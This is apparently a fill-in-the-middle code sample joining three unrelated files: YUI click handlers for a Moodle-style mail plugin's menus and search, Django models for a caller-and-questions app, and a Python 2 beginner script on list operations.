mail_select_all(); mail_update_menu_actions(); }, '.mail_menu_option_all'); //Menu select none Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_none(); }, '.mail_menu_option_none'); //Menu select read Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_read(); mail_main_checkbox(); mail_update_menu_actions(); }, '.mail_menu_option_read'); //Menu select unread Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_unread(); mail_main_checkbox(); mail_update_menu_actions(); }, '.mail_menu_option_unread'); //Menu select starred Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_starred(); mail_main_checkbox(); mail_update_menu_actions(); }, '.mail_menu_option_starred'); //Menu select unstarred Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_unstarred(); mail_main_checkbox(); mail_update_menu_actions(); }, '.mail_menu_option_unstarred'); Y.one("#region-main").delegate('click', function(e) { mail_check_selected(); }, '.mail_optselect'); Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); }, '.mail_labelselect'); //Menu action starred Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('starred'); mail_update_menu_actions(); }, '.mail_menu_action_markasstarred'); //Menu action unstarred Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('unstarred'); mail_update_menu_actions(); }, '.mail_menu_action_markasunstarred'); //Menu action markasread Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('markasread'); mail_update_menu_actions(); }, '.mail_menu_action_markasread'); //Menu action markasunread Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('markasunread'); mail_update_menu_actions(); }, '.mail_menu_action_markasunread'); //Menu action editlabel Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_label_edit(); }, '.mail_menu_action_editlabel'); //Menu action removelabel Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_label_confirm_delete(e); }, '.mail_menu_action_removelabel'); //Starred and unstarred Y.one('#region-main').delegate('click', function(e) { e.preventDefault(); mail_doaction('togglestarred', this); mail_update_menu_actions(); }, '.mail_flags a'); //Delete button Y.one("#region-main").delegate('click', function(e) { if (!this.hasClass('mail_button_disabled')) { mail_doaction('delete'); } }, '#mail_delete'); //Discard button Y.one("#region-main").delegate('click', function(e) { if (!this.hasClass('mail_button_disabled')) { mail_doaction('discard'); } }, '#mail_discard'); //Restore button Y.one("#region-main").delegate('click', function(e) { if (!this.hasClass('mail_button_disabled')) { mail_doaction('restore'); } }, '#mail_restore'); //Prev page button Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('prevpage'); }, 'input[name="prevpage"]'); //Prev page button Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('nextpage'); }, 'input[name="nextpage"]'); //Go back button Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('goback'); }, '.mail_goback'); //Mail per page Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('perpage', this); }, 'div.mail_perpage a'); //Hide all menus Y.on('click', function(e) { mail_hide_menu_options(); mail_hide_menu_actions(); mail_hide_menu_labels(); mail_hide_menu_search(); }, 'body'); //Show message Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('viewmail', this); }, 'a.mail_link'); //Click apply changes on labels Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_labels(); mail_doaction('assignlabels'); }, '.mail_menu_label_apply'); //Click new label Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_labels(); mail_label_new(); }, '.mail_menu_label_newlabel'); //Click label on menu labels Y.one("#region-main").delegate('click', function(e) { mail_menu_label_selection(this); mail_customize_menu_label(); }, '.mail_menu_labels li'); //Click notification bar undo Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); var ancestor = Y.one('#mail_notification'); if (ancestor.hasClass('mail_enabled')) { ancestor.removeClass('mail_enabled').addClass('mail_novisible'); mail_doaction('undo'); } }, '#mail_notification_undo'); //Click cancel search button Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doing_search = false; mail_hide_menu_search(); mail_doaction('goback'); mail_before_message_search = false; mail_after_message_search = false; mail_reset_date_selected(); }, '#buttoncancelsearch'); //Click search button Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); var date; mail_hide_menu_options(); mail_hide_menu_actions(); mail_hide_menu_labels(); mail_toggle_menu_search(); if (!mail_date_selected) { mail_reset_date_selected(); } mail_set_selected_date(mail_date_selected); }, '#mail_search'); //Click menu search Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); M.form.dateselector.panel.hide(); }, '#mail_menu_search'); //Click adv search Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_adv_search(); }, '#mail_toggle_adv_search'); //Click date search Y.one("#local_mail_main_form").delegate('click', function(e) { e.stopPropagation(); if(Y.one('#dateselector-calendar-panel').hasClass('yui3-overlay-hidden')) { M.form.dateselector.panel.show(); } else { M.form.dateselector.panel.hide(); } }, '.mail_search_date'); Y.on('contentready', function() { if (M.form.dateselector.calendar) { M.form.dateselector.calendar.on('dateClick', mail_get_selected_date); M.form.dateselector.calendar.set('maximumDate', new Date()); M.form.dateselector.panel.set('zIndex', 1); Y.one('#dateselector-calendar-panel').setStyle('border', 0); M.form.dateselector.calendar.render(); } }, '#dateselector-calendar-panel'); //Click on button search Y.one("#region-main").delegate('keydown', function(e) { e.stopPropagation(); if (e.keyCode == 13) { this.focus(); mail_do_search(); } }, '#textsearch, #textsearchfrom, #textsearchto'); //Click on button search Y.one("#region-main").delegate('click', function(e) { mail_do_search(); }, '#buttonsearch');<|fim▁hole|> mail_update_url(); });<|fim▁end|>
//Initialize init();
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models class TimeStampedModel(models.Model): created = models.DateTimeField(auto_now_add=True) modified = models.DateTimeField(auto_now=True) class Meta: abstract = True class Caller(TimeStampedModel): name = models.CharField(max_length=30) phone_number = models.CharField(max_length=15) question_num = models.IntegerField(default=0) start_num = models.IntegerField(default=0) end_num = models.IntegerField(default=0) start_fresh = models.BooleanField(default=True) intro_text = models.CharField(max_length=1600) outro_text = models.CharField(max_length=1600) def __str__(self): return self.name<|fim▁hole|>class Question(TimeStampedModel): num = models.IntegerField() question_text = models.CharField(max_length=1600) def __str__(self): return self.question_text[:100] + '...' class Choice(TimeStampedModel): question = models.ForeignKey(Question, related_name='choices') choice_text = models.CharField(max_length=1600) num = models.IntegerField() def __str__(self): return self.choice_text[:100] + '...'<|fim▁end|>
<|file_name|>lists2.py<|end_file_name|><|fim▁begin|>def no_extreme(listed): """ Takes a list and chops off extreme ends """ del listed[0] del listed[-1:] return listed def better_no_extreme(listed): """ why better ? For starters , does not modify original list<|fim▁hole|> return listed[1:-1] t = ['a','b','c'] print t print '\n' print 'pop any element : by t.pop(1) or t.remove(\'b\') or del t[1]' del t[1] print t st = ['a','b','c','d','e','f'] print st del st[1:3] print 'del t[1:3] works as well : ', st print 'Mid part is : ',no_extreme(st) str = raw_input("\nEnter a string to be converted to list : ") listr = list(str) print listr str2=raw_input("\nEnter a line to be separated into words : ") listr2 = str2.split()#separated at spaces print listr2 print 'You can split a line into words by changing the parameter as str2.split(parameter)' print 'this splits at - ' print 'joining statement : ' delimeter=' ' print delimeter.join(listr2) print '\nNote: 2 identical lists are 2 objects ,so l_a is l_b for identical lists still says False' print 'This does not happen for strings etc' print 'l_a is l_b only true if assigned as l_b = l_a' print '\n t.append(x) returns None , whereas t+[y] is not None' print '\n Never t = t[1:] as empty , same goes for t.sort()' print '\nDO\'s : t.append(x)\n t = t+[x] \n ' print 'Keep copy of original just in case : orig = t[:] \nt.sort()' print '\nDONT\'s : t.append([x])\n t = t.append(x) \n t + [x] \n t = t + x'<|fim▁end|>
"""